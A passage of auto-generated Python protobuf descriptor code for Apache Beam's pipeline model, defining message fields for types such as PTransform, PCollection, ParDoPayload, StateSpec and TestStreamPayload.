name='unique_name', full_name='org.apache.beam.model.pipeline.v1.PTransform.unique_name', index=0,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='spec', full_name='org.apache.beam.model.pipeline.v1.PTransform.spec', index=1,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='subtransforms', full_name='org.apache.beam.model.pipeline.v1.PTransform.subtransforms', index=2,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inputs', full_name='org.apache.beam.model.pipeline.v1.PTransform.inputs', index=3,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='outputs', full_name='org.apache.beam.model.pipeline.v1.PTransform.outputs', index=4,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='display_data', full_name='org.apache.beam.model.pipeline.v1.PTransform.display_data', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_PTRANSFORM_INPUTSENTRY, _PTRANSFORM_OUTPUTSENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1449,
serialized_end=1885,
)
_STANDARDPTRANSFORMS = _descriptor.Descriptor(
name='StandardPTransforms',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_STANDARDPTRANSFORMS_PRIMITIVES,
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES,
_STANDARDPTRANSFORMS_COMPOSITES,
_STANDARDPTRANSFORMS_COMBINECOMPONENTS,
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1888,
serialized_end=3632,
)
_STANDARDSIDEINPUTTYPES = _descriptor.Descriptor(
name='StandardSideInputTypes',
full_name='org.apache.beam.model.pipeline.v1.StandardSideInputTypes',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_STANDARDSIDEINPUTTYPES_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3635,
serialized_end=3765,
)
_PCOLLECTION = _descriptor.Descriptor(
name='PCollection',
full_name='org.apache.beam.model.pipeline.v1.PCollection',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='unique_name', full_name='org.apache.beam.model.pipeline.v1.PCollection.unique_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='coder_id', full_name='org.apache.beam.model.pipeline.v1.PCollection.coder_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='is_bounded', full_name='org.apache.beam.model.pipeline.v1.PCollection.is_bounded', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='windowing_strategy_id', full_name='org.apache.beam.model.pipeline.v1.PCollection.windowing_strategy_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='display_data', full_name='org.apache.beam.model.pipeline.v1.PCollection.display_data', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3768,
serialized_end=3992,
)
_PARDOPAYLOAD_SIDEINPUTSENTRY = _descriptor.Descriptor(
name='SideInputsEntry',
full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4483,
serialized_end=4578,
)
_PARDOPAYLOAD_STATESPECSENTRY = _descriptor.Descriptor(
name='StateSpecsEntry',
full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4580,
serialized_end=4675,
)
_PARDOPAYLOAD_TIMERSPECSENTRY = _descriptor.Descriptor(
name='TimerSpecsEntry',
full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4677,
serialized_end=4772,
)
_PARDOPAYLOAD = _descriptor.Descriptor(
name='ParDoPayload',
full_name='org.apache.beam.model.pipeline.v1.ParDoPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='do_fn', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.do_fn', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='parameters', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.parameters', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='side_inputs', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.side_inputs', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='state_specs', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.state_specs', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timer_specs', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.timer_specs', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='splittable', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.splittable', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='restriction_coder_id', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.restriction_coder_id', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='requests_finalization', full_name='org.apache.beam.model.pipeline.v1.ParDoPayload.requests_finalization', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_PARDOPAYLOAD_SIDEINPUTSENTRY, _PARDOPAYLOAD_STATESPECSENTRY, _PARDOPAYLOAD_TIMERSPECSENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=3995,
serialized_end=4772,
)
_PARAMETER_TYPE = _descriptor.Descriptor(
name='Type',
full_name='org.apache.beam.model.pipeline.v1.Parameter.Type',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_PARAMETER_TYPE_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4858,
serialized_end=4948,
)
_PARAMETER = _descriptor.Descriptor(
name='Parameter',
full_name='org.apache.beam.model.pipeline.v1.Parameter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='org.apache.beam.model.pipeline.v1.Parameter.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_PARAMETER_TYPE, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4775,
serialized_end=4948,
)
_STATESPEC = _descriptor.Descriptor(
name='StateSpec',
full_name='org.apache.beam.model.pipeline.v1.StateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.value_spec', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='bag_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.bag_spec', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='combining_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.combining_spec', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='map_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.map_spec', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='set_spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.set_spec', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='spec', full_name='org.apache.beam.model.pipeline.v1.StateSpec.spec',
index=0, containing_type=None, fields=[]),
],
serialized_start=4951,
serialized_end=5331,
)
_VALUESTATESPEC = _descriptor.Descriptor(
name='ValueStateSpec',
full_name='org.apache.beam.model.pipeline.v1.ValueStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='coder_id', full_name='org.apache.beam.model.pipeline.v1.ValueStateSpec.coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5333,
serialized_end=5367,
)
_BAGSTATESPEC = _descriptor.Descriptor(
name='BagStateSpec',
full_name='org.apache.beam.model.pipeline.v1.BagStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='element_coder_id', full_name='org.apache.beam.model.pipeline.v1.BagStateSpec.element_coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5369,
serialized_end=5409,
)
_COMBININGSTATESPEC = _descriptor.Descriptor(
name='CombiningStateSpec',
full_name='org.apache.beam.model.pipeline.v1.CombiningStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='accumulator_coder_id', full_name='org.apache.beam.model.pipeline.v1.CombiningStateSpec.accumulator_coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='combine_fn', full_name='org.apache.beam.model.pipeline.v1.CombiningStateSpec.combine_fn', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5411,
serialized_end=5533,
)
_MAPSTATESPEC = _descriptor.Descriptor(
name='MapStateSpec',
full_name='org.apache.beam.model.pipeline.v1.MapStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key_coder_id', full_name='org.apache.beam.model.pipeline.v1.MapStateSpec.key_coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value_coder_id', full_name='org.apache.beam.model.pipeline.v1.MapStateSpec.value_coder_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5535,
serialized_end=5595,
)
_SETSTATESPEC = _descriptor.Descriptor(
name='SetStateSpec',
full_name='org.apache.beam.model.pipeline.v1.SetStateSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='element_coder_id', full_name='org.apache.beam.model.pipeline.v1.SetStateSpec.element_coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5597,
serialized_end=5637,
)
_TIMERSPEC = _descriptor.Descriptor(
name='TimerSpec',
full_name='org.apache.beam.model.pipeline.v1.TimerSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='time_domain', full_name='org.apache.beam.model.pipeline.v1.TimerSpec.time_domain', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timer_coder_id', full_name='org.apache.beam.model.pipeline.v1.TimerSpec.timer_coder_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5639,
serialized_end=5747,
)
_ISBOUNDED = _descriptor.Descriptor(
name='IsBounded',
full_name='org.apache.beam.model.pipeline.v1.IsBounded',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_ISBOUNDED_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5749,
serialized_end=5813,
)
_READPAYLOAD = _descriptor.Descriptor(
name='ReadPayload',
full_name='org.apache.beam.model.pipeline.v1.ReadPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='org.apache.beam.model.pipeline.v1.ReadPayload.source', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='is_bounded', full_name='org.apache.beam.model.pipeline.v1.ReadPayload.is_bounded', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5816,
serialized_end=5968,
)
_WINDOWINTOPAYLOAD = _descriptor.Descriptor(
name='WindowIntoPayload',
full_name='org.apache.beam.model.pipeline.v1.WindowIntoPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='window_fn', full_name='org.apache.beam.model.pipeline.v1.WindowIntoPayload.window_fn', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=5970,
serialized_end=6060,
)
_COMBINEPAYLOAD = _descriptor.Descriptor(
name='CombinePayload',
full_name='org.apache.beam.model.pipeline.v1.CombinePayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='combine_fn', full_name='org.apache.beam.model.pipeline.v1.CombinePayload.combine_fn', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='accumulator_coder_id', full_name='org.apache.beam.model.pipeline.v1.CombinePayload.accumulator_coder_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6062,
serialized_end=6180,
)
_TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK = _descriptor.Descriptor(
name='AdvanceWatermark',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceWatermark',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='new_watermark', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceWatermark.new_watermark', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6624,
serialized_end=6665,
)
_TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME = _descriptor.Descriptor(
name='AdvanceProcessingTime',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceProcessingTime',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='advance_duration', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceProcessingTime.advance_duration', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6667,
serialized_end=6716,
)
_TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS = _descriptor.Descriptor(
name='AddElements',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AddElements',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='elements', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AddElements.elements', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6718,
serialized_end=6822,
)
_TESTSTREAMPAYLOAD_EVENT = _descriptor.Descriptor(
name='Event',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='watermark_event', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.watermark_event', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='processing_time_event', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.processing_time_event', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='element_event', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.element_event', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TESTSTREAMPAYLOAD_EVENT_ADVANCEWATERMARK, _TESTSTREAMPAYLOAD_EVENT_ADVANCEPROCESSINGTIME, _TESTSTREAMPAYLOAD_EVENT_ADDELEMENTS, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='event', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.event',
index=0, containing_type=None, fields=[]),
],
serialized_start=6299,
serialized_end=6831,
)
_TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT = _descriptor.Descriptor(
name='TimestampedElement',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='encoded_element', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElement.encoded_element', index=0,
number=1, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timestamp', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElement.timestamp', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6833,
serialized_end=6897,
)
_TESTSTREAMPAYLOAD = _descriptor.Descriptor(
name='TestStreamPayload',
full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='coder_id', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.coder_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='events', full_name='org.apache.beam.model.pipeline.v1.TestStreamPayload.events', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TESTSTREAMPAYLOAD_EVENT, _TESTSTREAMPAYLOAD_TIMESTAMPEDELEMENT, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6183,
serialized_end=6897,
)
_WRITEFILESPAYLOAD_SIDEINPUTSENTRY = _descriptor.Descriptor(
name='SideInputsEntry',
full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=4483,
serialized_end=4578,
)
_WRITEFILESPAYLOAD = _descriptor.Descriptor(
name='WriteFilesPayload',
full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='sink', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.sink', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='format_function', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.format_function', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
